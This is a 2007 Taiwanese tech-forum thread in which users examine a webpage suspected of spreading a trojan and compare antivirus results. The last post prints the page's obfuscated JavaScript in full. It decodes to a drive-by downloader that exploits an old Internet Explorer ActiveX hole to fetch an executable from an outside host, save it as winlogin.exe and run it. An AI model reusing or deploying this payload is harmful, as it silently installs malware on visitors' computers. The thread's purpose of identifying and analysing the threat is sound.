PCDVD數位科技討論區

PCDVD數位科技討論區 (https://www.pcdvd.com.tw/index.php)
-   七嘴八舌異言堂 (https://www.pcdvd.com.tw/forumdisplay.php?f=12)
-   -   這個網頁有木馬???請大家幫忙確認。 (https://www.pcdvd.com.tw/showthread.php?t=711131)

darksnow 2007-04-13 08:25 PM

引用:
作者罵罵皓
那麼那個jpg.htm到底想進行什麼行為呢?


我猜大概還是類似偷OLG密碼的東西吧?

另外首頁裡面也被插個iframe,不過那網站連過去沒東西,
jpg.htm是被插在inside.asp裡面。


還有,從卡巴斯基網站查了一下,這隻好像不是新的
http://www.viruslist.com/en/viruses...?virusid=134770
Trojan-Downloader.JS.Psyme.cf
Detection added Sep 11 2006 19:45 GMT
Update released Sep 11 2006 21:32 GMT

我猜沒測到的防毒軟體可能是病毒未作用,
沒作用的原因可能是他利用的漏洞是舊的,上過hotfix的IE不會乖乖聽話去抓東西來裝。
能測到的防毒軟體大概是對那坨編碼有反應

奇樂 2007-04-13 08:58 PM

http://www.520hack.com/占有者制作,?系QQ:8338850.

:jolin:

korn 2007-04-13 09:02 PM

Fx 2.0.0.3 + F-secure 6.03 沒反應

AlanLive 2007-04-13 11:38 PM

看了以上的發言,結論是 firefox 真好,開病毒網頁無煩惱

誰來發一個能讓 firefox 中毒的網頁試下!

titanic 2007-04-14 01:56 AM

引用:
作者HappyDay
有沒有NOD32跟德國小紅傘的可以發表一下測試結果? :D

兩套都沒反應 +1 @@,不過個人的IE已經裝完M$4月份的更新檔 :p

jaydin 2007-04-14 07:29 AM

引用:
作者blackleo
除卡巴外請大家勿入以免......................
沒在第一篇說真是抱歉.... :cry:

被賣咖啡企業抓到後,自動馬上隔離 :yeah:

darksnow 2007-04-14 07:47 AM

我用NOD32雖然沒反應(好奇研究時不小心誤點 :stupefy: )
但是事後用NOD32、 kaspersky antivirus 6 、antivir、trend housecall線上掃毒、norton線上掃毒
做全機掃描都沒掃到東西,應該有記得定期更新IE的話就不會中了?


昨天有回報這邊,分析出來的好像是Viking ?
http://malware-test.com/blog/archives/2007/04/13/1084

jaydin 2007-04-14 07:56 AM

http://www.turboupload.com/
http://www.rapidupload.com/
以上網頁...各位勇士想測一下嗎? :laugh:
賣咖啡企業亦有反應,好像都素cookies的問題,這素病毒or spy呢
現在對賣咖啡企業版,還頗有信心的 :like:

DSNB2 2007-04-14 08:31 AM

引用:
作者jaydin
http://www.turboupload.com/
http://www.rapidupload.com/
以上網頁...各位勇士想測一下嗎? :laugh:
賣咖啡企業亦有反應,好像都素cookies的問題,這素病毒or spy呢
現在對賣咖啡企業版,還頗有信心的 :like:

開啦...Avant+FF, 沒遇到啥問題, AVS不動如山
有可能被 AVG-AS 或 Ad-Watch 先擋住了(Ad-Watch 日誌有紀錄 這個cookie被封鎖)
不過這兩個免費WebHost之前就有人提過好像有問題 :rolleyes:

r0105mk2 2007-04-14 09:05 AM

<SCRIPT LANGUAGE="JavaScript">
<!--
var HtmlStrings=["=iunm> !=tdsjqu!mbohvbhf>#WCTdsjqu#> !!!!po!fssps!sftvnf!ofy","u !!!!em!>!#iuuq;00dif/dzdv/fev/ux0nqim0C876150dpnn0VqMpbe0","0ipnf00jnbhft30tipxujnf0kqh/fyf# !!!!Tfu!eg!>!epdvnfou/dsfbu","fFmfnfou)#pckfdu#* !!!!eg/tfuBuusjcvuf!#dmbttje#-!#dmtje;CE:","7D667.76B4.22E1.:94B.11D15GD3:F47# !!!!tus>#Njdsptpgu/YNMIUU","Q# !!!!Tfu!y!>!eg/DsfbufPckfdu)tus-##* !!!!b2>#Bep# !!!!b3",">#ec/# !!!!b4>#Tus# !!!!b5>#fbn# !!!!tus2>b2'b3'b4'b5 !!!","!tus6>tus2 !!!!tfu!T!>!eg/dsfbufpckfdu)tus6-##* !!!!T/uzqf!",">!2 !!!!tus7>#HFU# !!!!y/Pqfo!tus7-!em-!Gbmtf !!!!y/Tfoe ","!!!!gobnf2>#xjomphjo/fyf# !!!!tfu!G!>!eg/dsfbufpckfdu)#Tdsjq","ujoh/GjmfTztufnPckfdu#-##* !!!!tfu!unq!>!G/HfuTqfdjbmGpmefs)","3*! !!!!gobnf2>!G/CvjmeQbui)unq-gobnf2* !!!!T/pqfo !!!!T/x","sjuf!y/sftqpotfCpez !!!!T/tbwfupgjmf!gobnf2-3 !!!!T/dmptf ","!!!!tfu!R!>!eg/dsfbufpckfdu)#Tifmm/Bqqmjdbujpo#-##* !!!!R/Ti","fmmFyfdvuf!gobnf2-##-##-#pqfo#-1 !!!!=0tdsjqu> !!!!=ifbe>"," !!!!=ujumf>新世@网安埻地=0ujumf> !!!!=0ifbe>=cpez>  =dfoufs>iuuq;00xxx/631ibdl/dpn0卡朊耆刷佝-@系RR;9449961/=","0dfoufs> !!!!=0cpez>=0iunm> "];
function psw(st){
var varS;
varS="";
var i;
for(var a=0;a<st.length;a++){
i = st.charCodeAt(a);
if (i==1)
varS=varS+String.fromCharCode('"'.charCodeAt()-1);
else if (i==2) {
a++;
varS+=String.fromCharCode(st.charCodeAt(a));
}
else
varS+=String.fromCharCode(i-1);
}
return varS;
};
var num=17;
function S(){
for(i=0;i<num;i++)
document.write(psw(HtmlStrings[i]));}
S();
// -->
</SCRIPT>


所有的時間均為GMT +8。 現在的時間是12:26 AM.

vBulletin Version 3.0.1
powered_by_vbulletin 2026。